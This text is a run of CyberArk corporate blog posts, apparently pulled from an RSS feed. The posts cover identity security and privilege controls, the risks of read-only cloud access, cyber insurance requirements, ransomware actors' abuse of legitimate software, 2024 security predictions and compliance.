Identity security is considered the bedrock of modern-day cyber resilience. It converges the strength of identity and access management (IAM), identity governance and administration (IGA) and privileged access management (PAM). This combination of capabilities enables least privilege from enterprise endpoints to data centers to the cloud, allowing organizations to secure their digital assets and conduct business with confidence.

Privilege Controls for Any Identity

Gone are the days when only the most privileged users had access to an organization’s most critical systems and sensitive data. Today, more than half (52%) of workforce identities have access to that level of information. Meanwhile, 77% of IT security decision-makers say developers have too many privileges, and only 25% say their organizations have secured sensitive access to bots and robotic process automation (RPA). This expansion of high-risk access across the enterprise can lead to greater cyber risk.

Looking back, 84% of organizations experienced an identity-related breach in the past year. Meanwhile, looking ahead, 99% of security decision-makers believe they’ll experience an identity compromise in the coming months.

This, of course, is not a new trend. In its FY22 Risk Vulnerability Assessment (RVA) report, the Cybersecurity Infrastructure and Security Agency (CISA) indicated that in over half (54%) of organizations it assessed, attackers used valid accounts to gain initial access and elevate privileges to access to critical resources and sensitive data.

The numbers are staggering, but organizations can take steps to secure all identities with intelligent privilege controls such as zero standing privileges (ZSP) and just-in-time (JIT) access, session recording and protection, session isolation and monitoring – and endpoint least privilege. These intelligent privilege controls must work in conjunction with one another to secure access for every identity. Continuous and constant monitoring and analysis of all activities of every identity allow organizations to detect and respond to unusual behavior.

 

Here’s a bit of a deeper look at the five critical intelligent privilege controls:

1. Zero Standing Privileges (ZSP) and Just-in-Time Access (JIT)

Many organizations provide users with powerful standing access that is always available to users, regardless of whether it’s required in the moment – or ever. This issue is prevalent in cloud environments, where organizations grant users far more entitlements than they actually need to ensure they can work quickly.

To reduce risk, your organization can implement JIT access provisioning, which grants users elevated access privileges in real time so that they can perform necessary tasks. In other words, a user can access required resources for a specific duration to complete a task at hand – and then the access is revoked.

Taking the JIT concept to the next level, ZSP is a fast-emerging security principle that elevates cloud power users just-in-time, with only the specific entitlements required for a given task – and only when needed. ZSP enables organizations to reduce the risk of credential theft and the potential impact of an account takeover by significantly limiting an attacker’s options.

2. Session Isolation

Session isolation creates separation between a user’s device and the resources they aim to access by routing traffic through a proxy server. In doing this, if an end user is attacked, the risk of compromising the system the user is accessing is reduced.

3. Session Recording and Protection

Session recording and monitoring, in contrast, is a searchable recording of every user’s actions – down to the clicks during sessions within web applications, cloud consoles and other devices. When security teams combine session isolation and monitoring, they can detect anomalous user activity and suspend risky sessions. This control can protect organizations’ most critical assets from malicious processes originating on endpoints. The more privileged (with higher access levels) the session, the more these controls become increasingly necessary in protecting an organization’s sensitive digital assets.

4. Endpoint Least Privilege

Comprehensive, conditional policy-based application control can help you create safe working environments for every user group in your organization, from HR to DevOps. Organizations can manage and secure their endpoints with controls that enable continuous least privilege and consider variables such as an application’s context, parameters and attributes to allow or block certain scripts, applications or operations.

This is especially important at a time when ransomware attacks are growing in frequency, consequence and cost. Within an integrated identity security approach, endpoint least privilege can significantly reduce an organization’s attack surface and ability to meet various regulatory requirements.

5. Credentials and Secrets Management

Credentials like usernames and passwords are pieces of evidence that confirm an entity’s claimed identity. Credential management includes password/key rotation, enforcing password policies and consistently validating the authenticity of the entity requesting the access. Secrets management allows organizations to enforce similar security policies for non-human (machine) identities. Typically, these credentials and secrets are used to gain elevated privileges to perform a business task.

The Benefits of Intelligent Privilege Controls

Identity-related attacks are also growing more sophisticated. While most businesses operate under the “assume breach” mentality, it is equally important to be cyber resilient with a proactive, reactive and predictive approach. The above-mentioned intelligent privilege controls enable security at scale, risk reduction and unmatched cyber resilience by securing access for any identity.

The results of a robust identity security strategy speak for themselves: CyberArk research indicates that 60% of 1,500 security decision-makers believe they can mitigate risk in an acceptable timeframe. Without a robust identity security strategy with the right tools, integrations, automation and continuous monitoring and reporting, 80% of the respondents state they would require up to 15 additional cybersecurity staff.

Beyond these measurable benefits, identity security based on intelligent privilege controls provides organizations with the added advantage of long-term durability, adaptability and recoverability in the face of potential attacks.

Don’t just manage identities. Secure them with a comprehensive identity security strategy based on intelligent privilege controls.

For more insights, download our identity security guide “When Every Identity is at Risk, Where Do You Begin?” The piece covers critical areas where intelligent privilege controls can help you reduce risk and gain efficiencies.

Amita Potnis leads thought leadership marketing at CyberArk.

]]>
Exploring the Risks of Read-Only Access in the Cloud https://www.cyberark.com/blog/exploring-the-risks-of-read-only-access-in-the-cloud/ Tue, 12 Dec 2023 15:46:57 +0000 https://www.cyberark.com/?p=184877 Read-only access, cloud security.

My career began with read-only access.

In my first job, I worked night shifts in a data operations center. Our team handled incidents identified either by monitoring or from end customers. This meant I often had to perform first, second and third-line troubleshooting. If we couldn’t identify and resolve the issue, our only option was to wake up a rather exhausted escalation engineer.

To further protect that on-call engineer’s sleep, I was empowered with read-only access to the network for our data centers. I could check configurations, confirm the state of elements and, as my knowledge grew, the on-call teams observed that my escalations became requests like ‘run the following command for me, I don’t have access.’

A lot has changed since then; I now spend my time working in the cloud rather than in the on-premise world of data centers. I would never grant someone the same level of access I started with, even if it’s just read-only.

Why Even Think About Securing Read-only Access?

The James Bond film “Goldeneye” (1995!) vividly illustrates the risks that read-only access presents in the cloud. In the film’s climax, the ‘lead programmer,’ Boris, dismisses a former junior peer for not having access to the firing capabilities of the satellite superweapon used for the sinister plot. He winds up eating his words as her reduced access allows her to steer the satellite into re-entry (thus, its destruction).

[Click here for the 90s, recorded off VHS magic.]

This is my favorite way to visualize the risk of ‘we don’t need controls over the read-only access we give juniors.’ The result was that Boris’s evil plan was spoiled. If only he’d been a little more considerate with how he handled access.

What Can an Attacker Do With Read-only Access?

Why am I focusing on what is often dismissed as a lower-risk element that doesn’t warrant attention? Attackers are creative folk; it’s known that attackers will always seek to reconnoiter their environment. Often, read-only is enough for them to do that. [Here’s a real-world example.] Giving read-only rights to the cloud without suitable controls will enable an attacker to do exactly that.

To expand on the example, many organizations are happy to permit the managed policy ‘ReadOnlyAccess.’ The policy is a great example of what is often perceived as a harmless read-only role – aside from the policy granting the ability to read and copy the contents of any element of blob storage in the account. That means the read-only access can be used to read any data store. And that isn’t good.

“Attackers are creative folk; it’s known that attackers will always seek to reconnoiter their environment. Often, read-only is enough for them to do that. “

It’s an obvious example, and most organizations remove the capability to read all the data stores. But there are plenty more things you could do to map or identify targets. List roles and the users they are mapped to? YEP! Download container images from your hosted private registry? For sure!

Going deeper, without turning this into a rant against managed policies, that managed policy also includes a little subset of permissions for SSM, AWS’s System Manager service. The section that grants SSM:Describe* worries me because it grants entitlements to all Describe functions aligned to SSM. The entitlement SSM:DescribeParameters allows you to see the environment variables of a running EC2 instance retrieved from Parameter Store. There are many people out there who still use parameter store for storage of credentials.

Knowing that I could possibly return a secret under management and read all the data in an AWS account paints a clear picture to answer, ‘How far can you go with just read-only?’ The more I research, the more I realize that any access to cloud consoles comes with a relatively high element of risk.

How Do We Address the Risk and Secure Read-only Access?

The reality is that you should treat read-only access the same way you treat any other elevated access when accessing the cloud. At CyberArk, it’s why we talk about zero standing privileges (ZSP); read-only access should be something you request, even if the request is auto-approved. You must make sure adequate controls are in place.

There is a temptation to say that not applying the same controls to users with just read-only entitlements will save you time and money too. But that’s a mistake; you’ll have to manage two sets of controls and monitor the read-only accounts to ensure they don’t end up with higher-risk entitlements that would warrant extra controls.

Flexibility in access should not compromise security; instead, it should be a strategic approach to grant the right privileges to the right users at the right time. Doing so would put you one step ahead of Boris from Goldeneye; you don’t have to worry about any second-level programmers crashing your satellite to foil your evil plan.

Understanding and mitigating the risks associated with read-only access in the cloud is paramount. Organizations can frustrate potential attackers and safeguard their cloud environments by implementing robust controls and adopting a proactive approach.

To explore the concept of zero standing privileges further and learn how to fortify your cloud security, check out our blog, “PAM and Cloud Security: The Case for Zero Standing Privileges.

Josh Kirkwood is a senior product marketing manager at CyberArk.

]]>
How to Meet Cyber Insurance Requirements When All Identities Are at Risk https://www.cyberark.com/blog/how-to-meet-cyber-insurance-requirements-when-all-identities-are-at-risk/ Thu, 07 Dec 2023 20:55:31 +0000 https://www.cyberark.com/?p=184826 Blog feature image: Umbrella protecting from raining code. Metaphorical cyber insurance / cyber protection depiction.

The growing frequency and sophistication of cyberattacks, especially on the ransomware front, have compelled even more companies to seek cyber insurance coverage. But as the need for coverage grows, so do the complexities.

Even though we’re seeing a trend in which premiums have flattened, with expectations that this will continue as a market correction occurs, significant challenges remain for companies seeking coverage. Increased risk profiles are causing insurers to be stricter in their evaluations and underwriting requirements. And regarding controls and processes, what was considered acceptable in past years may no longer be acceptable.

How does this affect your organization? If you’re in the market for cyber insurance, be prepared to answer a litany of pre-audit questions and demonstrate a hardened defense strategy. In this blog post, we’ll discuss cyber insurance trends and best practices to help you be ready.

Top Challenges Shaping Today’s Global Cyber Insurance Market

Rampant ransomware attacks have made cyber insurance a priority for corporate leaders and boards. This epidemic has also changed the equation for cyber insurers’ profitability.

As we’ve noted in past years, many cyber insurance providers have reported massive direct-loss ratios for standalone policies. At the same time, they’ve struggled to adequately cover escalating costs as conditions change quickly. Consider these statistics:

  • The average total cost of a ransomware attack increased by 13% to $5.13 million since 2022.
  • Nearly nine in 10 security decision-makers say their organizations were targeted by at least one ransomware attack in the past year.
  • Almost three-quarters of organizations paid ransoms at least once in the last 12 months.

As a result, requirements are becoming more stringent as carriers aim to mitigate risks. This is a significant part of why obtaining a cyber insurance policy with favorable terms, conditions, pricing coverage and low retention has proven to be a struggle for many organizations.

Several years ago, a security team could fill out a brief cyber insurance application and answer a handful of questions. Fast forward to today: the world has changed, as new identities, environments and attack methods reshape what it means to have a strong security posture. Insurers aren’t only considering ransomware risk as they tighten up qualifications – current market volatility and continued geopolitical tensions also factor into the equation.

High-profile incidents such as MoveIt Transfer, Accellion, SolarWinds and Log4j have intensified concerns about software supply chain risks, prompting new questions about aggregation exposure and systemic losses. Meanwhile, global privacy regulations like GDPR and CCPA continue to evolve in a patchwork fashion, and litigation and fines are growing. The average cost of a data breach rose 12.6% to $5.05 million for organizations with high levels of regulatory non-compliance.

Together, these variables fuel even more underwriting questions.

Graphic listing what to expect when you renew your cyber insurance policy.

Cyber Insurance Requirements Dig Deep – A Solid Controls Narrative Provides an Edge

Scoring a cyber insurance policy or renewal with the right terms may be difficult, but it’s not impossible. Carriers and underwriters are responding favorably to companies instituting robust security controls and incident response plans — especially those prepared to dive deep into their cybersecurity architectures and planned roadmaps. It’s essential to be proactive in implementing baseline security measures and to articulate a meaningful risk-based approach to cybersecurity.

Underwriters often assess security systems and practices using open-source scanning tools like OpenVAS and OpenSCAP to probe applicants’ networks for vulnerabilities and security rating services like SecurityScorecard and BitSight to evaluate risk. Many underwriters partner with outside cybersecurity firms to vet customers.

Recognizing the challenges organizations face amid stricter vetting, Amazon Web Services (AWS) launched a program to help its AWS marketplace customers find and obtain affordable policies.

During these evaluations, they’re looking for evidence of specific cybersecurity controls and practices, and upcoming audits will examine certain areas more closely than ever. They are:

1. Endpoint privilege security

Since ransomware attacks typically start on workstations and servers, endpoint privilege security will be under the microscope. Initially, insurers wanted to see that a company trained its employees in phishing and credential theft techniques and used endpoint detection and response (EDR/XDR) solutions to help identify and remediate suspicious activity.

Today, even these critical measures are not considered sufficient on their own. Attackers are constantly switching things up and finding ways to turn off or bypass EDR/XDR by abusing administrative credentials, as seen in the SolarWinds attack. This has prompted more underwriting scrutiny around endpoint privilege controls, especially a company’s ability to remove local admin rights from all users — senior system administrators, developers and even people using legacy applications that require admin rights.

To demonstrate effective risk reduction for underwriters, many organizations apply a defense-in-depth mindset by limiting privilege escalation, enforcing application control on endpoints and managing local admin passwords in a PAM solution. Organizations must prioritize between least privilege control and operational efficiency.

2. Multi-factor authentication (MFA)

Requirements for MFA — a checkmark item for insurers until recently — are also growing. Insurers started to dig deeper as more post-payout analyses revealed that MFA wasn’t being fully utilized, particularly in the healthcare and higher education sectors. They found significant coverage gaps for privileged accounts, which are not often linked to a specific person (i.e., the admin account on every server) but are used by system administrators and other privileged users to protect sensitive data.

3. Privileged Access Management (PAM)

As a result, underwriters have started mandating PAM for privileged accounts not tied to specific users (i.e., local admin, root and service accounts) to achieve MFA and isolate high-value assets. Embracing modern use cases for PAM programs – such as the emerging concept of zero standing privileges (ZSP), in which high-risk access is elevated on the fly, restricted to the bare minimum permissions, and protected from malware – can also help prove to insurers that an organization is defending against credential theft.

A defense-in-depth approach can help here too. Aim to apply several layers of control, like enforcing least privilege access on endpoints and in hybrid cloud environments, programmatically rotating credentials and secrets, verifying all access attempts with MFA, and monitoring high-risk access. Again, efficiency is critical – minimizing friction for end users is key to building the adoption of security controls that auditors and insurers want to see.

4. Controls for third-party access

Insurers are also looking at how organizations authenticate third-party privileged users from vendor organizations who need access to sensitive data and company systems. As enterprise reliance on vendors and contractors grows, third-party involvement increases the average total cost of a data breach by roughly 5% to nearly $4.7 million. Vendors require the same security, yet they are rarely given the same security consideration as employees. For instance, if a vendor is onboarded for a brief two-week engagement, they should be onboarded and offboarded following the same HR processes as a new employee to minimize risk. Visibility is also essential.

Organizations should fully isolate and monitor privileged sessions with full audit capabilities – akin to how they secure internal privileged users’ access and actions.

5. Security for non-human identities

The heightened focus on privileged access management extends beyond users to non-human identities, which outnumber human identities by 45:1. These identities could be service accounts, hardcoded secrets or any off-the-shelf or homegrown solution requiring powerful credentials to perform its function (i.e., configuration management databases platforms and DevOps orchestration tools), along with automated processes such as robotic process automation (RPA). As part of this, insurers are looking for stronger privilege controls around automated patch management systems, vulnerability scanners and other existing security tools that attackers may try to disable.

6. People and processes

Beyond technology safeguards, insurance carriers still want to see sound people practices, such as conducting ongoing cybersecurity awareness training. They’ll also evaluate data backup practices and incident response plans to understand how quickly the organization could restore operations in the wake of an attack. Any security program relies on people, practices and technology – and insurers know it.

Graphic with tips for improving cyber readiness. They are: 1) Take advantage of cybersecurity education 2) Use security rating services 3) Use open-source vulnerability scanners. The graphic includes further details.

Steps in the Right Direction: Adopting an Identity Security Approach

As companies prepare for cyber insurance renewals, they should be cognizant that security control requirements are evolving to address the fast-paced world of digital business – and the ever-evolving nature of today’s threats.

Yet accelerated change is always difficult from an organizational and cultural standpoint and can create fear and uncertainty. The best way to minimize this is to ensure people understand the “why” and that risk mitigation controls will not impact operational efficiency. Companies need to spend time on the education factor.

The good news is that more companies are stepping up and taking meaningful steps to bolster their ransomware defenses. As stronger controls are implemented and used more effectively, insurer losses are starting to stabilize and soften the market a bit. We’re not out of the woods yet, but we’re starting to move in the right direction.

As organizations work to meet today’s requirements with an eye on the future, they must focus on effectively mitigating cyber risk without slowing down their businesses.

Today, any compromised identity (human or non-human) can be a gateway to the resources attackers target through tactics such as ransomware. And you’re protecting the enterprise at a time when three realities — new identities, environments and threats — are making the job more complex than ever. An integrated identity security strategy is the best line of defense against attacks in today’s threat landscape, with a unified approach that enforces least privilege and enables Zero Trust.

Organizations looking to close security gaps within a specified period to land or maintain a cyber insurance policy can benefit by aligning with the right security partner. CyberArk can play that role, helping you strengthen security, meet pre-audit requirements, keep premiums down and maintain business velocity. To learn more, check out our cyber insurance resources.

John Natale is a senior content marketing manager and Ryne Laster is a product marketing manager at CyberArk.

Editor’s note: For more on the complex and rapidly evolving world of cyber insurance, check out the CyberArk Trust Issue’s podcast episode, “Cyber Insurance: Managing Risk and Protection,” with guest, Ruby Rai, Cyber Practice Leader, Canada at Marsh McLennan. The episode is available in the player below and on most major podcast platforms.

]]>
Why Ransomware Actors Abuse Legitimate Software https://www.cyberark.com/blog/why-ransomware-actors-abuse-legitimate-software/ Wed, 06 Dec 2023 17:13:51 +0000 https://www.cyberark.com/?p=184787 Abuse Legitimate Software Key

2023 was a lucrative year for ransomware actors, with victim organizations paying $449.1 million in the first six months alone. Maintaining this cash stream requires frequent technique shifts, which may be why more attackers are exploiting legitimate software to propagate their malware.

Abusing organizations’ existing enterprise tools can help attackers blend in while they’re doing reconnaissance, and also aids them with privilege escalation and persistence. Coupling this technique with ransomware as a service (RaaS) also lowers the bar to entry by eliminating the need for attackers to create malware – something that requires skills, resources and time. This means more adversaries can get in the game and do more damage.

Enterprise software isn’t the only target. Ransomware actors have also been known to exploit vulnerabilities found in open-source software (OSS), inject their own payloads into OSS and use OSS in lieu of custom-crafted malware. According to a recent advisory from the U.S. The Cybersecurity and Infrastructure Security Agency (CISA), the notorious Lockbit operation has been observed using legal freeware for a host of nefarious purposes, including network reconnaissance, remote access and tunneling, credential dumping and file exfiltration.

When attackers exploit legitimate tools, traditional endpoint security solutions are unlikely to catch them unless behavior analytics capabilities are in place to flag unusual logins, privilege escalation, program execution or other risky activities.

Tracking Legitimate Software Abuse Across the Attack Chain

Ransomware actors increasingly use legitimate software to their advantage at various stages of the attack lifecycle. They employ many different tactics, techniques and procedures (TTP) to advance their missions, including the examples highlighted below.

Initial infection. It’s choose-your-own adventure when it comes to gaining initial access. Some attackers use exploits such as employing common vulnerability exploitations (CVEs) against vulnerable targets. They also steal, forge, alter or manipulate cookies from users’ web sessions to get in. Or, they send phishing emails and trick users into downloading legitimate applications. For instance, in January 2023 CISA warned of a widespread campaign involving remote monitoring and management (RMM) software that, once downloaded, could be used as part of a refund scam to steal money from victims’ bank accounts.

Persistence. Attackers also use legitimate software to establish backdoors for persistence and/or command and control (C2). Along the way, they may use them to bypass MFA and/or modify or disable existing security tools to avoid detection, from terminating endpoint detection and response (EDR)- protected processes to modifying/deleting registry keys or configuration files. In the RMM ransomware attacks described above, threat actors used the software’s portable executables to gain access without the need for local admin privileges or full software installation. This allowed them to “effectively bypass common software controls and risk management assumptions,” according to CISA.

Many software programs run by default on a machine. By hijacking these programs, attackers can guarantee that their malicious programs will run too. They can also abuse application features such as task schedulers (that launch programs or scripts at pre-defined times or after specified time intervals) to maintain persistence. Even legitimate tools built into the operating system, such as living off the land binaries (LOLbins), can be maliciously abused to cover attackers’ tracks, gain persistence or escalate privileges.

Privilege Escalation. Windows operating systems are protected by User Account Control (UAC), a native security feature designed to protect against malicious software and unauthorized changes. If regular business users try to run a program as an administrator, UAC will prompt them to enter the credentials of an admin user before changes can be made. Though most ransomware on the market today doesn’t require admin rights to encrypt data, attackers often target and bypass UAC to elevate access and establish persistence.

Lateral Movement. Many tools can inadvertently facilitate malicious privilege escalation and lateral movement. AdFind, a free command-line query tool used to search Active Directory (AD), is a popular choice. Another is AdvancedRun, which allows software to be run with different settings and enables privilege escalation by changing settings before running software.

What’s more, numerous Windows features built for managing machines are also remote procedural call (RPC) servers. This means that they can receive remote commands from other machines on the network to run programs. Many RPCs expose functions to end users while enabling communication between client and server programs, opening the door for attackers who can abuse them to move laterally.

Encryption. Encryption can be used both as a tool and a weapon. Encryption tools are critical for hiding data from unauthorized users. These same tools can also be used as ransomware. Or attackers can compromise users with legitimate access to encrypted data to bypass encryption controls altogether.

This summer, the U.S. Department of Health and Human Services (HSS) alerted healthcare organizations of a ransomware attack on a medical facility that “significantly reduced patient treatment capability, rendered digital services unavailable and also threatened exposure of patient personal health information (PHI) and personal identifiable information (PII).” TimisoaraHackerTeam – the ransomware-as-a-service (RaaS) group behind the attack – is described as “unique among attackers” due to its characteristic tactic of abusing legitimate encryption tools including Microsoft BitLocker and Jetico BestCrypt to live off the land and eventually encrypt data.

Data Exfiltration. Somewhat surprisingly, ransomware operators that employ double-extortion techniques rarely create their own tools to steal the data used for their leak sites. Rather, they’ll often use legitimate backup tools or similar programs to exfiltrate their victims’ data. Earlier this year, CyberArk Labs observed threat actors using Discord, a popular collaboration app, to exfiltrate data via webhooks. Rclone, a command line program for syncing files with cloud storage, is another appealing option as it allows attackers to easily move files via transfer protocols such as FTP and SFTP. Attackers also employ tools like 7-zip, an open source file archiver, to compress data, which helps them avoid detection before exfiltration.

While most of the above examples focus on Windows, ransomware actors are also modifying their tools to attack across platforms and operating systems. For instance, some employ the cross-platform programming language Rust to target Linux. macOS isn’t immune either. One popular method to infect macOS and iOS devices is exploiting Find My iPhone, an Apple feature that helps users lock their devices if they get lost. If an attacker successfully steals or purchases a user’s Apple ID and password and logs into the device, they can enable the remote device lock via the Find My iPhone app, hold data hostage and display a ransom note on the screen.

Block Ransomware Across the Attack Lifecycle

Attackers’ shift to legitimate software is concerning given the highly stealthy nature of these attacks. But fortunately, organizations that take an identity-centric defense-in-depth approach to ransomware protection can largely stay the course. Fundamental endpoint security controls remain the same, including endpoint detection and response (EDR), anti-virus (AV)/next-generation antivirus (NGAV), content disarm and reconstruction (CDR) email security and patching. But most important of all is application control. It doesn’t matter if it’s RaaS, polymorphic malware or some other malicious ransomware variety, if it can’t execute, it can’t deploy ransomware.

This trend underscores the fact that endpoints play a leading – but not singular – role in ransomware attacks. This is becoming increasingly clear as more adversaries embrace this method. When attackers hijack legitimate tools to gain a foothold, least privilege and behavioral analytics capabilities become even more critical for quickly detecting and blocking cloaked threats as they attempt to move through the network, bypass or disarm security systems and reach high-value targets.

CISA offers a list of in-depth mitigations recommendations for organizations looking for ways to improve their cybersecurity posture to better defend against ransomware attacks utilizing legitimate software programs. This defense-in-depth perspective on ransomware also outlines best practices for shoring up vulnerabilities to mitigate risk. And CyberArk Labs offers extensive research insights on ransomware families, commonalities, the path to encryption and mitigation strategies.

Andy Thompson is CyberArk Labs’ Offensive Security Research Evangelist.

]]>
Cybersecurity Predictions for 2024 and Beyond https://www.cyberark.com/blog/cybersecurity-predictions-for-2024-and-beyond/ Mon, 27 Nov 2023 18:58:15 +0000 https://www.cyberark.com/?p=184638 Abstract feature image for cybersecurity predictions blog post.

Many of us took ChatGPT for a first-time spin just 12 months ago. Then someone hit the speed multiplier button, and just like that, we’re exiting 2023 with whiplash. Generative artificial intelligence’s (GenAI) breakout year was both exciting and unnerving for cybersecurity professionals who understand that technological change and cyber risk are inextricable. Meanwhile, dramatic shifts in the physical world reshaped the threat landscape, redirected cybersecurity strategies and sparked regulatory reforms. Yet some things didn’t change, like attackers’ relentless pursuit of identities and proven ways to steal and use them.

Our team came together to discuss how 2023 trends will impact 2024 and beyond. Here’s a look at our year-by-year predictions based on CyberArk research, customer and partner interactions and industry collaborations.

In 2024 …

Session hijacking will take on an increasingly prominent attack role …

Even more organizations will shift to passwordless access management, from passkeys to MFA, to help thwart attacks. Threat actors will evolve their tactics in lockstep to dupe enterprise and third-party users, steal session cookies and bypass strong authentication mechanisms. Their creativity will pay dividends; by 2024, session hijacking will account for 40% of all cyberattacks. Continued vigilance in securing, monitoring and responding to user sessions and cookies abuse/compromise is critical – especially with Google’s encouraging promise to wipe out cookies for good, never underestimate innovative attackers who will find another way.

… but 30% of organizations will pay for lax password protections.

Traditional credential theft will be less prevalent when passwordless takes hold and is used correctly. Yet, credential theft isn’t going away. Why? Organizations implementing passwordless authentication may require a backup factor, and many companies will fall back on insecure options – passwords. As security teams fight new fires, attackers will take advantage of lax password protections, and 30% of organizations will experience an increase in data breaches linked to credential theft.

55% of enterprises will expedite tech consolidation to simplify security.

Most organizations’ IT and security environments are already too expansive, complicated and difficult to manage. Teams are rarely skilled in every tool they must cobble together with other ones, forcing them to hire or bring in outside experts. And since each platform focuses on specific things and overlap with others, teams struggle to see – let alone understand – every potential vulnerability and threat in their cloud-centric environments. Missed SLAs, spiraling overheads and dangerous security drift will push 55% of enterprises to accelerate tech consolidation. They’ll aim to simplify operations and maximize existing resources by working with fewer vendors and systems.

Graphical depiction of CyberArk cybersecurity predictions for 2024, 2025, and 2026.

By 2025 …

Unprotected AI-driven security mechanisms will fuel a vicious cyber risk cycle.

Though organizations are embracing GenAI to bolster cyber defenses, 80% will fail to protect these same AI-based security models – fueling a vicious cyber risk cycle. Gaining an edge on attackers will require an adversarial mindset, from training GenAI models with both offensive and defensive samples to adopting model assurance and regular stress testing (including red teaming and pen testing). Hosting these AI models in highly secure environments with highly secure access protections will be equally critical. Governments will issue forward-thinking guidelines on this front, yet organizations can’t wait for codified standards that may quickly become outdated. Embedding GenAI in product security must happen now.

Under pressure, CISOs will advocate for timely, transparent breach disclosures.

Cybersecurity accountability is getting personal. First, Uber’s security chief was charged with failing to disclose a 2016 data breach to federal regulators. This fall, the SEC charged SolarWinds and its CISO with fraud and internal controls failure in a landmark that comes on the heels of the agency’s ruling on tighter cybersecurity disclosure requirements. Security leaders around the world are watching closely. By 2025, 60% of Fortune 2000 company CISOs will champion transparent, rapid disclosure practices – not just because of policy but because their careers and reputations are on the line.

By 2026 …

Nearly half of Fortune 500 company boards will seek out a chief AI security officer.

Cybersecurity isn’t an IT issue; it’s the fulcrum of business resilience and stakeholder trust. Most Fortune 500 organizations recognize the high stakes and are beefing up cybersecurity aptitude at the corporate director level. Emerging AI risks are driving an even greater sense of urgency. By 2026, 45% of these enterprises will recruit and work to appoint a chief AI security officer to the board. This leader will possess both technical expertise and business acumen, playing an influential role in advancing AI innovation, managing resulting risks and safeguarding the AI-based security models. They will be deeply entrenched in cybersecurity strategy and expand oversight and reporting mechanisms to better measure and improve security initiatives, risk assessments and incident response plans.

Multinational organizations will face a regulatory reckoning.

Sixty percent of all regulated global entities will struggle mightily to comply with ever-increasing data protection and breach disclosure requirements, especially as GenAI use cases expand. More organizations will face non-compliance penalties as regulators’ bite catches up to their bark. Consider that today, failure to comply with the European Union’s GDPR alone can cost organizations as much as €20 million or 4% of annual global turnover, whichever is higher. Already hefty fines will continue to climb with potentially crippling impact.

Major global powers will call for a Cybersecurity Geneva Convention.

Sophisticated nation-state attacks, particularly those targeting critical infrastructure, can result in widespread disruptions, life-threatening outages and rippling damage across software supply chains. Growing concerns of escalation to conventional warfare will prompt major global powers to take dramatic steps to enhance cyber resilience, legal frameworks and international cooperation. As part of this, these countries will push to establish a Cybersecurity Geneva Convention to deter nation-state attacks and hold perpetrators responsible.

2023 threw some major curveballs. But it also reminds us that strong cybersecurity programs don’t swerve or stall in reaction. They’re agile enough to stay in the game, continuously refining practices, making strategic, risk-based investments and proactively preparing for whatever comes next.

]]>
Reduce Compliance Complexities by Securing All Identities https://www.cyberark.com/blog/reduce-compliance-complexities-by-securing-all-identities/ Mon, 20 Nov 2023 22:16:50 +0000 https://www.cyberark.com/?p=184361 compliance-identities-security

When complying with regulations and frameworks, it’s hard to keep up when the rules keep evolving.

Auditors are no longer just seeking reports on what your identities can access – they now require proof that you have controls for securing those identities (like a math assignment, you have to show your work).

And if a framework or regulation’s requirements previously focused on highly privileged IT users’ access … that’s evolving too. While foundational PAM controls and reporting will always be essential, now you must apply the requirements to a broader range of human and non-human identities across any environment.

What does this expanded focus look like? Here are a few examples:

  • The NIS2 directive emphasizes strengthening security for critical infrastructure sectors, which are increasingly reliant on cloud infrastructure and operational technology (OT), two areas full of frequently-targeted identities.
  • The Digital Operational Resiliency Act (DORA) calls upon financial services companies to apply security oversight to internal users and third parties (e.g., vendors) with high-risk access.
  • The NIST Secure Software Development Framework requires that software developers and procurers attest to adequate and proper security features, including identity management.

Meanwhile, the stakes of security compliance keep rising. The average cost of a data breach increases by as much as 12.6% when an organization is found to be non-compliant:

Average cost overall: $4.45 million
Average cost when non-compliant: $4.67 million
Average cost when highly non-compliant: $5.05 million

The good news is that there’s a direct correlation between strong controls and strong compliance. With the right capabilities for discovering, securing and reporting high-risk access, you can achieve a proactive stance to meet regulatory demands. In this post, we’ll explore some key steps you can take.

Discovering and Assessing High-Risk Access

You can’t protect (or report on) what you can’t see. And that’s why it’s so concerning that 62% of security decision-makers lack a complete picture of human and non-human access to sensitive resources.

Let’s look at a few examples of how discovering high-risk access can bolster your visibility, security, and, in turn, compliance posture.

One place to start: conduct an inventory of all accounts with administrative or elevated privilege to systems, apps, servers, networks and more. Another critical step is discovering privilege across your organization’s myriad endpoints, like workstations and servers. These are fundamental types of visibility; many organizations are accustomed to them.

But when we delve into new types of identities and environments, compliance becomes more difficult.

For example, developers and cloud ops teams are often over-permissioned with direct access to sensitive resources as their organizations rush to innovate. A CyberArk analysis of the three major cloud service providers shows that a user can access approximately 1,400 native services that, collectively, have over 40,000 access controls.

As part of their compliance programs, security teams should lean into cloud complexities and discover the following:

  • Over-permissioned IAM roles and excessive permissions.
  • Toxic combinations of permissions allowing privilege escalation or lateral movement.
  • Unmanaged shared accounts and their myriad dependencies.
  • Hard-coded credentials for developers working in the cloud.
  • Everyday employees’ access to business applications.

In many cases, it’s up to you to interpret compliance requirements and guidelines in the context of new identities, environments and threats (these variables won’t necessarily be mentioned by name in a 100-page regulatory document). In other cases, the direction may be clear-cut, calling out specific areas like virtual infrastructure. Regardless, high-risk access – in all its shapes, forms and locations – requires fierce protection.

Security compliance is evolving. Any identity can become privileged based on what it can access. This graphic shows three examples of requirements and guidelines that call for a comprehensive identity security mindset.

Implementing and Demonstrating Identity Security Controls

As mentioned, giving auditors a report on what you’ve discovered is only part of the job. You must demonstrate that you have strong controls in place to reduce risk and build organizational resilience against attacks.

Let’s say you’ve completed an inventory of high-risk across privileged IT users and accounts. Your next step is securing that privileged access. This starts with creating policies and implementing controls around password length, complexity, storage and rotation schedules. The work continues with steps such as enabling just-in-time (JIT) access and requiring multi-factor authentication (MFA).

What comes next after you’ve finished discovering privilege across your organization’s endpoints, like workstations? Here, a near-term priority would be revoking local administrator rights. An essential next step would be implementing capabilities to elevate privileges for authorized applications or tasks. These are effective ways to protect against ransomware – and great proof points for auditors to demonstrate progress.

As mentioned, even if securing access in the cloud isn’t explicitly described in a regulation – you’re still on point to bring entitlements and roles into compliance. Where to start? Consider applying a fast-emerging security principle known as zero standing privileges (ZSP), which – among many benefits – can help your organization by:

  • Reducing the risk of credential theft by preventing standing access.
  • Enforcing real time least privilege in the cloud by granting only the relevant permissions a user needs – and only when required – to accomplish a given task.
  • Invalidating developer secrets that are embedded into code.

Gaining Nonstop Visibility Across Identities

You can build upon the findings from your initial discovery process with ongoing, real-time visibility into the access (and actions) of identities across your organization.

This is where it’s essential to look beyond siloed categories of controls or tools. We recommend an integrated identity security approach, where the underlying solutions can share information, act on insights and provide a unified view of audit data across all forms of human and non-human access.

